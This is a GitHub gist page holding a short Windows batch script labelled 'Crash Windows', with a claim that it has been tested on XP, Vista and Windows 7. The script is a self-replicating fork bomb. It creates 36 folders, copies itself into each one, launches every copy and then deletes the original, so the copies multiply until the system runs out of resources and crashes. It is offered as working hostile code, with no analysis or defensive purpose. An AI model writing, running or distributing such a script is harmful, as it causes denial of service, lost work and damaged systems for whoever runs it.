Skip to content

Instantly share code, notes, and snippets.

@davispuh
Last active December 27, 2015 22:39
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save davispuh/7400352 to your computer and use it in GitHub Desktop.
Save davispuh/7400352 to your computer and use it in GitHub Desktop.
Crash Windows. Tested to work for XP, Vista, Windows 7
@echo off
REM This script is dedicated to Public Domain
FOR %%i in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9) DO (
mkdir %%i
copy %~nx0 %%i
cd %%i
start %~nx0
cd ..
)
del %~nx0
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment